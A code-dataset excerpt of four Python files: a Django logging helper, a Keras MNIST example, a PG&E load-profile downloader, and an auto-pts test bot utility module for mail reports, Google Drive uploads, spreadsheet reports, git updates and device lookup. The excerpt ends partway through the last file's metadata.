+{"seq_id": "70575541529", "text": "# -*- coding: utf8 -*-\nimport logging , sys , traceback2\nimport loghandler\nfrom django.conf import settings\n\nimport os\n\ndef init_log( name = None , screen = False , thread = True ):\n #settings.check( 'LOGDIR' , 'LOGLEVEL' )\n return init_logger( name , settings.LOGDIR , screen , thread )\n\ninit = init_log\n\ndef init_logger( logname , logdir , screen = True , thread = True ):\n logobj = logging.getLogger( logname )\n # 判断是否需要清理\n if logobj.handlers:\n return logobj # 日志已创建,跳过\n# # 有处理句柄,则该日志对象需要清理\n logobj.info( '日志[%s]重新初始化' , logname )\n for hdl in logobj.handlers[:]:\n logobj.removeHandler( hdl )\n \n # 初始化日志文件处理句柄\n fn = '%s.log' % logname\n hdlr = loghandler.DateFileHandler( os.path.join( logdir , fn ) )\n fmts = '%(asctime)s ' + ( 'T%(thread)d ' if thread else '' ) + '%(levelname)s %(message)s'\n formatter = logging.Formatter( fmts )\n hdlr.setFormatter(formatter)\n logobj.addHandler( hdlr )\n \n if screen:\n # 初始化屏幕打印处理句柄\n hdlr = logging.StreamHandler()\n fmts = '%(asctime)s %(name)s:' + ( 'T%(thread)d ' if thread else '' ) + '%(levelname)s %(message)s'\n formatter = logging.Formatter( fmts )\n hdlr.setFormatter(formatter)\n logobj.addHandler( hdlr )\n\n logobj.setLevel( settings.LOGLEVEL )\n return logobj\n\ndef _fmt_msg( *args , **kwargs ):\n if len( args ) > 1:\n msg = args[0] % args[1:]\n elif len( args ) == 1:\n msg = args[0]\n else:\n msg = ''\n \n block = kwargs.get( 'block' )\n if type(block) is str:\n # 是块日志\n bin = kwargs.get( 'bin' , True )\n if bin:\n block = to_hex( block )\n \n if block:\n block = '\\n'+'='*40+'\\n'+block+ ('\\n' if block[-1] != '\\n' else '' ) +'='*40 + '\\n'\n elif msg[-1] == '\\n':\n block = ''\n else:\n block = '\\n'\n \n msg = msg + block\n if msg[-1] == '\\n':\n msg = msg[:-1]\n return msg\n \ndef debug( logname , *args , **kwargs ):\n if logname:\n logger = init_log( logname )\n logger.debug( _fmt_msg( *args , **kwargs ) )\n\ndef info( logname , *args , **kwargs ):\n if logname:\n logger = init_log( logname )\n logger.info( _fmt_msg( *args , **kwargs ) )\n \ndef warning( logname , *args , **kwargs ):\n if logname:\n logger = init_log( logname )\n logger.warning( _fmt_msg( *args , **kwargs ) )\n \ndef error( logname , *args , **kwargs ):\n if logname:\n logger = init_log( logname )\n logger.error( _fmt_msg( *args , **kwargs ) )\n \ndef critical( logname , *args , **kwargs ):\n if logname:\n logger = init_log( logname )\n logger.critical( _fmt_msg( *args , **kwargs ) )\n\ndef exception( logname , *args , **kwargs ):\n if logname:\n logger = init_log( logname )\n exc_msg = traceback2.format_exc( show_locals = True )\n args = list( args )\n if args:\n args[0] += '\\n%s'\n else:\n args.append( '%s' )\n args.append( exc_msg )\n logger.error( _fmt_msg( *args , **kwargs ) )\n return ''\n\nif __name__ == \"__main__\":\n init_log( 'zjxx' , True )\n init_log( 'zjxx' , True )", "repo_name": "chengdg/zjyw", "sub_path": "src/zjyw_utils/log.py", "file_name": "log.py", "file_ext": "py", "file_size_in_byte": 3335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.conf.settings.LOGDIR", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 10, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "loghandler.DateFileHandler", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 28, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 36, "usage_type": "call"}, {"api_name": "django.conf.settings.LOGLEVEL", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "traceback2.format_exc", "line_number": 98, "usage_type": "call"}]}
+{"seq_id": "74283937687", "text": "from keras.utils import to_categorical\nfrom keras import layers\nfrom keras import models\n\n\"\"\" (MNIST) It’s a set of 60,000 training\nimages, plus 10,000 test images, assembled by the National Institute of Standards and\nTechnology (the NIST in MNIST) in the 1980s. It's like the hello-world of programming in ML \"\"\"\n\nfrom keras.datasets import mnist\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\n\nnetwork = models.Sequential()\n\"\"\" layer is a data-processing module that\nyou can think of as a filter for data. Some data goes in, and it comes out in a more useful form. Specifically, layers extract representations out of the data fed into them—hopefully, representations that are more meaningful for the problem at hand. \"\"\"\nnetwork.add(layers.Dense(512, activation='relu', input_shape=(28 * 28,)))\nnetwork.add(layers.Dense(10, activation='softmax'))\n\"\"\" DENSE means the layers are densely connected (meanse that they are fully connected) \"\"\"\n\nnetwork.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\"\"\" 1: A loss function—How the network will be able to measure its performance on\nthe training data, and thus how it will be able to steer itself in the right direction.\n2: An optimizer—The mechanism through which the network will update itself\nbased on the data it sees and its loss function.\n3: Metrics to monitor during training and testing—Here, we’ll only care about accuracy(the fraction of the images that were correctly classified). \"\"\"\n\"\"\" Before training, we’ll preprocess the data by reshaping it into the shape the network\nexpects and scaling it so that all values are in the [0, 1] interval. \"\"\"\ntrain_images = train_images.reshape((60000, 28 * 28))\ntrain_images = train_images.astype('float32') / 255\ntest_images = test_images.reshape((10000, 28 * 28))\ntest_images = test_images.astype('float32') / 255\n\ntrain_labels = to_categorical(train_labels)\ntest_labels = to_categorical(test_labels)\nnetwork.fit(train_images, train_labels, epochs=5, batch_size=128)\ntest_loss, test_acc = network.evaluate(test_images, test_labels)\nprint('test_acc:', test_acc)\n", "repo_name": "Himanshunitrr/LearningAI", "sub_path": "MNIST.py", "file_name": "MNIST.py", "file_ext": "py", "file_size_in_byte": 2176, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "keras.datasets.mnist.load_data", "line_number": 10, "usage_type": "call"}, {"api_name": "keras.datasets.mnist", "line_number": 10, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 12, "usage_type": "call"}, {"api_name": "keras.models", "line_number": 12, "usage_type": "name"}, {"api_name": "keras.layers.Dense", "line_number": 15, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 15, "usage_type": "name"}, {"api_name": "keras.layers.Dense", "line_number": 16, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 16, "usage_type": "name"}, {"api_name": "keras.utils.to_categorical", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "2175484461", "text": "\"\"\"PG&E DLP data access\"\"\"\nimport os\nimport pycurl\nfrom io import BytesIO, StringIO, IOBase\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport numpy as np\nfrom zipfile import ZipFile\n\ndlpurl = \"https://www.pge.com/pge_global/forms/mads/profiles\"\ncachedir = \"__dlpcache__\"\n\nif not os.path.exists(cachedir):\n\tos.mkdir(cachedir)\n\ndef get_remote_file(url,out):\n\t\"\"\"Stream a file from the PG&E data archive\"\"\"\n\tc = pycurl.Curl()\n\tc.setopt(c.URL, url)\n\tc.setopt(c.WRITEDATA, out)\n\tc.perform()\n\tc.close()\n\ndef get_load_archive(year,cache=True,refresh=True):\n\t\"\"\"Copy a DLP archive for a previous year to the cache\"\"\"\n\tzipfile = f\"{cachedir}/{year}dlp.zip\"\n\twith open(zipfile,\"wb\") as zipfh:\n\t\tget_remote_file(f\"{dlpurl}/archive/{year}dlp.zip\",zipfh)\n\twith ZipFile(zipfile, 'r') as zipObj:\n\t\tfiles = zipObj.namelist()\n\t\tfor file in files:\n\t\t\tif file.endswith('.dlp'):\n\t\t\t\tzipObj.extract(file, f\"{cachedir}/{year}dlp\")\n\ndef get_load_profile(date,cache=True,refresh=False):\n\t\"\"\"Copy a DLP for a particular date to the cache and return a dataframe\"\"\"\n\tif date.year < datetime.now().year:\n\t\tget_load_archive(date.year)\n\n\tdatename = date.strftime('%Y%m%d')\n\tif not os.path.exists(f\"{cachedir}/{date.year}dlp\"):\n\t\tos.mkdir(f\"{cachedir}/{date.year}dlp\")\n\tcsvname = f\"{cachedir}/{date.year}dlp/{datename}.dlp\"\n\tif not cache or not os.path.exists(csvname) or refresh:\n\t\twith open(csvname,\"wb\") as csvfh:\n\t\t\tget_remote_file(f'{dlpurl}/{datename}.dlp',csvfh)\n\n\tdf = pd.read_csv(csvname).dropna(how='all').transpose()\n\tdf.columns = list(np.array(df[1:2])[0])\n\tassert(datename == df.index[0])\n\tdf.drop([datename,'Profile','Method'],inplace=True)\n\tdef get_time(date,time):\n\t\tt = time.split(':')\n\t\tt = (24+int(t[0]))*60 + int(t[1]) - 30\n\t\ty = int(date[0:4])\n\t\tm = int(date[4:6])\n\t\td = int(date[6:8])\n\t\tH = int(t/60) % 24\n\t\tM = t % 60\n\t\treturn datetime(y,m,d,H,M,0)\n\tdf['datetime'] = list(map(lambda t: datetime.strptime(datename+\" \"+t,\"%Y%m%d %H:%S\"),df.index))\n\tdf.set_index('datetime',inplace=True)\n\n\treturn df\n\ndef daterange(start_date, end_date):\n\t\"\"\"Obtain a date range\"\"\"\n\tfor n in range(int ((end_date - start_date).days+1)):\n\t\tyield start_date + timedelta(n)\n\ndef get_loads(start,stop,date_format='%m/%d/%y',show_progress=False):\n\t\"\"\"Obtain the loads for a date range as a dataframe\"\"\"\n\tif type(start) is str:\n\t\tstart = datetime.strptime(start,date_format)\n\tif type(stop) is str:\n\t\tstop = datetime.strptime(stop,date_format)\n\tblocks = []\n\tfor date in daterange(start,stop):\n\t\tif show_progress:\n\t\t\tprint(f\"Processing {date}...\",flush=True)\n\t\ttry:\n\t\t\tblocks.append(get_load_profile(date))\n\t\texcept Exception as err:\n\t\t\tprint(f\"ERROR: get_load_profile(date={date}): {err}\")\n\treturn pd.concat(blocks)\n\nif __name__ == '__main__':\n\tget_load_profile(datetime(2019,3,1,0,0,0))\n\tdata = get_loads('3/1/20','3/14/20')\n\tdata.to_csv('test_result.csv')\n", "repo_name": "slacgismo/pgande_dlp_archive", "sub_path": "src/pgande.py", "file_name": "pgande.py", "file_ext": "py", "file_size_in_byte": 2841, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.exists", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 14, "usage_type": "call"}, {"api_name": "pycurl.Curl", "line_number": 18, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 61, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 74, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 76, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 76, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 85, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "29561432875", "text": "import logging\nimport os\nimport re\nimport subprocess\nimport sys\nimport mimetypes\nimport shutil\nimport zipfile\nimport smtplib\nimport datetime\nfrom os.path import dirname, abspath\nfrom pathlib import Path\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\nfrom xmlrpc.client import ServerProxy\nimport git\nimport yaml\nimport xlsxwriter\n\nfrom googleapiclient import discovery, errors\nfrom googleapiclient.http import MediaFileUpload\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\n\nSCOPES = 'https://www.googleapis.com/auth/drive'\nCLIENT_SECRET_FILE = 'client_secret.json'\nREPORT_XLSX = \"report.xlsx\"\nREPORT_TXT = \"report.txt\"\nCOMMASPACE = ', '\n\ndevices_in_use = []\nPROJECT_DIR = dirname(dirname(abspath(__file__)))\n\n# ****************************************************************************\n# Mail\n# ****************************************************************************\n\n\ndef status_dict2summary_html(status_dict):\n \"\"\"Creates HTML formatted summary from status dictionary\n :param status_dict: status dictionary, where key is status and value is\n status count\n :return: HTML formatted summary\n \"\"\"\n summary = \"\"\"Summary \n \"\"\"\n total_count = 0\n\n summary += \"\"\"\n Status \n Count \n \"\"\"\n\n for status in sorted(status_dict.keys()):\n count = status_dict[status]\n summary += \"\"\"\n {} \n {} \n \"\"\".format(status, count)\n total_count += count\n\n summary += \"\"\"\n Total \n {} \n \"\"\".format(total_count)\n summary += \"
\"\n\n if \"PASS\" in status_dict:\n pass_rate = \\\n '{0:.2f}%'.format((status_dict[\"PASS\"] / float(total_count) * 100))\n else:\n pass_rate = '{0:.2f}%'.format(0)\n summary += \"PassRate = {}
\".format(pass_rate)\n\n return summary\n\n\ndef url2html(url, msg):\n \"\"\"Creates HTML formatted URL with results\n :param url: URL\n :param msg: URL description\n :return: HTML formatted URL\n \"\"\"\n return \"{} \".format(url, msg)\n\n\ndef regressions2html(regressions, descriptions):\n \"\"\"Creates HTML formatted message with regressions\n :param regressions_list: list of regressions found\n :return: HTML formatted message\n \"\"\"\n msg = \"Regressions \"\n\n regressions_list = []\n for name in regressions:\n regressions_list.append(\n name + \" - \" + descriptions.get(name, \"no description\"))\n\n if regressions_list:\n for name in regressions_list:\n msg += \"{}
\".format(name)\n else:\n msg += \"No regressions found
\"\n\n return msg\n\n\ndef send_mail(cfg, subject, body, attachments=None):\n \"\"\"\n :param cfg: Mailbox configuration\n :param subject: Mail subject\n :param body: Mail boyd\n :return: None\n \"\"\"\n\n msg = MIMEMultipart()\n msg['From'] = cfg['sender']\n msg['To'] = COMMASPACE.join(cfg['recipients'])\n msg['Subject'] = subject\n\n msg.attach(MIMEText(body, 'html'))\n\n # Attach the files if there is any\n if attachments:\n for filename in attachments:\n file_type = mimetypes.guess_type(filename)\n if file_type[0] is None:\n ext = os.path.splitext(filename)[1]\n print('MIME Error: File extension %s is unknown. '\n 'Try to associate it with app.' % ext)\n continue\n mimetype = file_type[0].split('/', 1)\n attachment = MIMEBase(mimetype[0], mimetype[1])\n attachment.set_payload(open(filename, 'rb').read())\n encoders.encode_base64(attachment)\n attachment.add_header('Content-Disposition', 'attachment',\n filename=os.path.basename(filename))\n msg.attach(attachment)\n\n server = smtplib.SMTP(cfg['smtp_host'], cfg['smtp_port'])\n if 'start_tls' in cfg and cfg['start_tls']:\n server.starttls()\n if 'passwd' in cfg:\n server.login(cfg['sender'], cfg['passwd'])\n server.sendmail(cfg['sender'], cfg['recipients'], msg.as_string())\n server.quit()\n\n\n# ****************************************************************************\n# Google Drive\n# ****************************************************************************\nclass GDrive:\n def __init__(self, cfg):\n self.basedir_id = cfg['root_directory_id']\n self.cwd_id = self.basedir_id\n credentials = cfg['credentials_file']\n\n store = file.Storage(credentials)\n creds = store.get()\n if not creds or creds.invalid:\n path_abs = os.path.abspath(credentials)\n path = os.path.dirname(path_abs)\n\n flow = client.flow_from_clientsecrets(\n os.path.join(path, CLIENT_SECRET_FILE), SCOPES)\n creds = tools.run_flow(flow, store)\n self.service = discovery.build('drive', 'v3',\n http=creds.authorize(Http()))\n\n def pwd(self):\n return self.cwd_id\n\n def mkdir(self, name):\n file_metadata = {\n 'name': name,\n 'mimeType': 'application/vnd.google-apps.folder',\n 'parents': [self.pwd()]\n }\n\n try:\n f = self.service.files().create(\n body=file_metadata,\n fields='id, name, webViewLink').execute()\n except errors.HttpError:\n sys.exit(1)\n\n return f\n\n def ls(self):\n results = {}\n\n page_token = None\n while True:\n try:\n response = self.service.files().list(\n q=\"'{}' in parents\".format(self.pwd()),\n spaces='drive',\n fields='nextPageToken, files(id, name)',\n pageToken=page_token).execute()\n except errors.HttpError:\n sys.exit(1)\n\n for f in response.get('files', []):\n results[f.get('name')] = f\n page_token = response.get('nextPageToken', None)\n if page_token is None:\n break\n\n return results\n\n def cp(self, name):\n if not os.path.exists(name):\n print(\"File not found\")\n sys.exit(1)\n\n basename = os.path.basename(name)\n mime_type, encoding = mimetypes.guess_type(basename)\n\n file_metadata = {\n 'name': basename,\n 'parents': [self.pwd()]\n }\n\n media = MediaFileUpload(\n name,\n mimetype=mime_type)\n\n try:\n f = self.service.files().create(\n body=file_metadata,\n media_body=media,\n fields='id, name').execute()\n except errors.HttpError as err:\n print(err)\n sys.exit(1)\n\n return f\n\n def cd(self, dir_=None):\n \"\"\"\n :param dir_: file object or id of the folder\n \"\"\"\n if not dir_:\n self.cwd_id = self.basedir_id\n elif isinstance(dir_, str):\n self.cwd_id = dir_\n else:\n self.cwd_id = dir_.get('id')\n\n\nclass Drive(GDrive):\n def __init__(self, cfg):\n GDrive.__init__(self, cfg)\n self.url = None\n\n def new_workdir(self, iut):\n files = self.ls()\n if iut in list(files.keys()):\n dir_ = files[iut]\n else:\n dir_ = self.mkdir(iut)\n self.cd(dir_)\n dir_ = self.mkdir(datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M\"))\n self.cd(dir_)\n return \"{}\".format(dir_.get('webViewLink'))\n\n def upload(self, f):\n print(\"Uploading {} ...\".format(f))\n self.cp(f)\n print(\"Done\")\n\n def upload_folder(self, folder, excluded=None):\n def recursive(directory):\n with os.scandir(directory) as it:\n for f in it:\n if excluded and (f.name in excluded or\n os.path.splitext(f.name)[1] in excluded):\n continue\n\n if f.is_dir():\n parent = self.pwd()\n dir_ = self.mkdir(f.name)\n self.cd(dir_)\n recursive(os.path.join(directory, f.name))\n self.cd(parent)\n else:\n filepath = os.path.relpath(os.path.join(directory, f.name))\n self.upload(filepath)\n\n recursive(folder)\n\n\n# ****************************************************************************\n# .xlsx spreadsheet file\n# ****************************************************************************\n# FIXME don't use statuses from status_dict, count it from results dict instead\ndef make_report_xlsx(results_dict, status_dict, regressions_list,\n descriptions):\n \"\"\"Creates excel file containing test cases results and summary pie chart\n :param results_dict: dictionary with test cases results\n :param status_dict: status dictionary, where key is status and value is\n status count\n :param regressions_list: list of regressions found\n :return:\n \"\"\"\n\n errata = {}\n\n try:\n with open('errata.yaml', 'r') as stream:\n errata = yaml.safe_load(stream)\n except Exception as exc:\n print(exc)\n\n if errata is None:\n errata = {}\n\n header = \"AutoPTS Report: \" \\\n \"{}\".format(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\"))\n workbook = xlsxwriter.Workbook(REPORT_XLSX)\n worksheet = workbook.add_worksheet()\n chart = workbook.add_chart({'type': 'pie',\n 'subtype': 'percent_stacked'})\n\n # Add a bold format to use to highlight cells.\n bold = workbook.add_format({'bold': True})\n\n # Write data headers.\n worksheet.write('A1', header)\n worksheet.write_row('A3', ['Test Case', 'Result'])\n\n row = 3\n col = 0\n\n for k, v in list(results_dict.items()):\n worksheet.write(row, col, k)\n if k in errata:\n v += ' - ERRATA ' + errata[k]\n worksheet.write(row, col + 1, v)\n if k in list(descriptions.keys()):\n worksheet.write(row, col + 2, descriptions[k])\n if k in regressions_list:\n worksheet.write(row, col + 3, \"REGRESSION\")\n row += 1\n\n summary_row = 2\n summary_col = 5\n\n worksheet.write(summary_row, summary_col, 'Summary')\n end_row = summary_row\n for status in sorted(status_dict.keys()):\n count = status_dict[status]\n end_row += 1\n worksheet.write_row(end_row, summary_col, [status, count])\n\n # Total TCS\n row = end_row + 2\n col = summary_col\n total_count = len(results_dict)\n worksheet.write(row, col, \"Total\")\n worksheet.write(row, col + 1, \"{}\".format(total_count))\n worksheet.write(row + 1, col, \"PassRate\", bold)\n if \"PASS\" in status_dict:\n pass_rate = \\\n '{0:.2f}%'.format((status_dict[\"PASS\"] / float(total_count) * 100))\n else:\n pass_rate = '{0:.2f}%'.format(0)\n worksheet.write(row + 1, col + 1, pass_rate, bold)\n\n chart.set_title({'name': 'AutoPTS test results'})\n chart.add_series({\n 'categories': ['Sheet1', summary_row + 1, summary_col,\n end_row, summary_col],\n 'values': ['Sheet1', summary_row + 1, summary_col + 1,\n end_row, summary_col + 1],\n })\n\n worksheet.insert_chart('H2', chart)\n workbook.close()\n\n return os.path.join(os.getcwd(), REPORT_XLSX)\n\n\n# ****************************************************************************\n# .txt result file\n# ****************************************************************************\ndef make_report_txt(results_dict, zephyr_hash):\n \"\"\"Creates txt file containing test cases results\n :param results_dict: dictionary with test cases results\n :return: txt file path\n \"\"\"\n\n filename = os.path.join(os.getcwd(), REPORT_TXT)\n f = open(filename, \"w\")\n\n errata = {}\n\n try:\n with open('errata.yaml', 'r') as stream:\n errata = yaml.safe_load(stream)\n except Exception as exc:\n print(exc)\n\n if errata is None:\n errata = {}\n\n f.write(\"%s\\n\" % zephyr_hash)\n for tc, result in list(results_dict.items()):\n if tc in errata:\n result += ' - ERRATA ' + errata[tc]\n\n # The frist id in the test case is test group\n tg = tc.split('/')[0]\n f.write(\"%s%s%s\\n\" % (tg.ljust(8, ' '), tc.ljust(32, ' '), result))\n\n f.close()\n\n return filename\n\n\n# ****************************************************************************\n# Miscellaneous\n# ****************************************************************************\ndef archive_recursive(dir_path):\n \"\"\"Archive directory recursively\n :return: newly created zip file path\n \"\"\"\n zip_file_path = os.path.join(os.path.dirname(dir_path),\n os.path.basename(dir_path) + '.zip')\n with zipfile.ZipFile(zip_file_path, 'w', allowZip64=True) as zf:\n for root, dirs, files in os.walk(dir_path):\n for file_or_dir in files + dirs:\n zf.write(\n os.path.join(root, file_or_dir),\n os.path.relpath(os.path.join(root, file_or_dir),\n os.path.join(dir_path, os.path.pardir)))\n\n return zip_file_path\n\n\ndef archive_testcases(dir_path, depth=3):\n def recursive(directory, depth):\n depth -= 1\n with os.scandir(directory) as it:\n for f in it:\n if f.is_dir():\n if depth > 0:\n recursive(os.path.join(directory, f.name), depth)\n else:\n filepath = os.path.relpath(os.path.join(directory, f.name))\n archive_recursive(filepath)\n shutil.rmtree(filepath)\n\n recursive(dir_path, depth)\n return dir_path\n\n\ndef upload_bpv_logs(gdrive, args):\n \"\"\"Copy Bluetooth Protocol Viewer logs from auto-pts servers.\n :param gdrive: to upload the logs\n :param server_addr: list of servers addresses\n :param server_port: list of servers ports\n \"\"\"\n excluded = ['SIGDatabase', 'logfiles', '.pqw6', '.xml', '.txt']\n logs_folder = 'tmp/' + args.workspace\n\n shutil.rmtree(logs_folder, ignore_errors=True)\n\n if sys.platform == 'win32':\n workspace_path = get_workspace(args.workspace)\n shutil.copytree(workspace_path, logs_folder)\n archive_testcases(logs_folder, depth=3)\n gdrive.upload_folder(logs_folder, excluded=excluded)\n delete_bpv_logs(workspace_path)\n return\n\n server_addr = args.ip_addr\n server_port = args.srv_port\n\n for i in range(len(server_addr)):\n if i != 0 and server_addr[i] in server_addr[0:i]:\n continue\n\n with ServerProxy(\"http://{}:{}/\".format(server_addr[i], server_port[i]),\n allow_none=True,) as proxy:\n file_list = proxy.list_workspace_tree(args.workspace)\n if len(file_list) == 0:\n continue\n\n workspace_root = file_list.pop()\n while len(file_list) > 0:\n file_path = file_list.pop(0)\n try:\n file_bin = proxy.copy_file(file_path)\n\n if not os.path.splitext(file_path)[1] in ['.pts', '.pqw6']:\n proxy.delete_file(file_path)\n\n if file_bin is None:\n continue\n\n file_path = '/'.join([logs_folder,\n file_path[len(workspace_root) + 1:]\n .replace('\\\\', '/')])\n Path(os.path.dirname(file_path)).mkdir(parents=True,\n exist_ok=True)\n\n with open(file_path, 'wb') as handle:\n handle.write(file_bin.data)\n except BaseException as e:\n logging.exception(e)\n\n if os.path.exists(logs_folder):\n archive_testcases(logs_folder, depth=3)\n gdrive.upload_folder(logs_folder, excluded=excluded)\n\n\ndef get_workspace(workspace):\n for root, dirs, files in os.walk(os.path.join(PROJECT_DIR, 'workspaces'),\n topdown=True):\n for name in dirs:\n if name == workspace:\n return os.path.join(root, name)\n return None\n\n\ndef delete_bpv_logs(workspace_path):\n with os.scandir(workspace_path) as it:\n for f in it:\n if f.is_dir():\n shutil.rmtree(f.path, ignore_errors=True)\n\n\ndef update_sources(repo_path, remote, branch, stash_changes=False, update_repo=True):\n \"\"\"GIT Update sources\n :param repo: git repository path\n :param remote: git repository remote name\n :param branch: git repository branch name\n :param stash_changes: stash non-committed changes\n :param update_repo: update repo\n :return: Commit SHA at HEAD\n \"\"\"\n repo = git.Repo(repo_path)\n\n if update_repo:\n print('Updating ' + repo_path)\n\n dirty = repo.is_dirty()\n if dirty and (not stash_changes):\n print('Repo is dirty. Not updating')\n return repo.git.describe('--always'), \\\n repo.git.show('-s', '--format=%H') + '-dirty'\n\n if dirty and stash_changes:\n print('Repo is dirty. Stashing changes')\n repo.git.stash('--include-untracked')\n\n repo.git.fetch(remote)\n repo.git.checkout('{}/{}'.format(remote, branch))\n\n return repo.git.describe('--always'), \\\n repo.git.show('-s', '--format=%H')\n\n\ndef update_repos(project_path, git_config):\n \"\"\"GIT Update sources\n :param project_path: path to project root\n :param git_config: dictionary with configuration of repositories\n :return: repos_dict with {key=repo name, {commit, desc}}\n \"\"\"\n project_path = os.path.abspath(project_path)\n repos_dict = {}\n\n for repo, conf in list(git_config.items()):\n repo_dict = {}\n if not os.path.isabs(conf[\"path\"]):\n repo_path = os.path.join(project_path, conf[\"path\"])\n else:\n repo_path = os.path.abspath(conf[\"path\"])\n\n project_path.join(repo_path)\n\n if 'update_repo' in conf:\n update_repo = conf[\"update_repo\"]\n else:\n update_repo = True\n\n desc, commit = update_sources(repo_path, conf[\"remote\"],\n conf[\"branch\"], conf[\"stash_changes\"],\n update_repo)\n repo_dict[\"commit\"] = commit\n repo_dict[\"desc\"] = desc\n repos_dict[repo] = repo_dict\n\n return repos_dict\n\n\ndef get_free_device(board=None):\n tty = None\n jlink = None\n\n snr_initials_for_debugger = {\n \"nrf52\": '68',\n \"nrf53\": '96'\n }\n\n com_index_for_debugger = {\n \"nrf52\": '00',\n \"nrf53\": '04'\n }\n\n debugger_snrs = subprocess.Popen('nrfjprog -i',\n shell=True,\n stdout=subprocess.PIPE\n ).stdout.read().decode()\n\n debugger_snrs = debugger_snrs.split()\n\n for d_snr in debugger_snrs:\n if d_snr[:2] != snr_initials_for_debugger[board]:\n continue\n\n d_tty = subprocess.Popen('ls -l /dev/serial/by-id' +\n '/usb-SEGGER_J-Link_000' + d_snr +\n '-if' + com_index_for_debugger[board],\n shell=True,\n stdout=subprocess.PIPE\n ).stdout.read().decode()\n reg = \"(?=tty).+$\"\n d_tty = re.findall(reg, d_tty)\n\n if d_snr not in devices_in_use:\n devices_in_use.append(d_snr)\n jlink = d_snr\n tty = '/dev/' + d_tty[0]\n break\n\n if not tty:\n sys.exit('No free device found!')\n\n if tty.startswith(\"COM\"):\n tty = \"/dev/ttyS\" + str(int(tty[\"COM\".__len__():]) - 1)\n\n return tty, jlink\n\n\ndef release_device(jlink_srn):\n if jlink_srn:\n devices_in_use.remove(jlink_srn)\n\n\ndef pre_cleanup():\n \"\"\"Perform cleanup before test run\n :return: None\n \"\"\"\n try:\n shutil.copytree(\"logs\", \"oldlogs\", dirs_exist_ok=True)\n shutil.rmtree(\"logs\")\n except OSError:\n pass\n\n\ndef cleanup():\n \"\"\"Perform cleanup\n :return: None\n \"\"\"\n try:\n pass\n except OSError:\n pass\n", "repo_name": "hermabe/auto-pts", "sub_path": "bot/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 20994, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.dirname", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 35, "usage_type": "call"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 119, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 124, "usage_type": "call"}, {"api_name": "mimetypes.guess_type", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 136, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 138, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 138, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "smtplib.SMTP", "line_number": 143, "usage_type": "call"}, {"api_name": "oauth2client.file.Storage", "line_number": 161, "usage_type": "call"}, {"api_name": "oauth2client.file", "line_number": 161, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path", "line_number": 164, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 165, "usage_type": 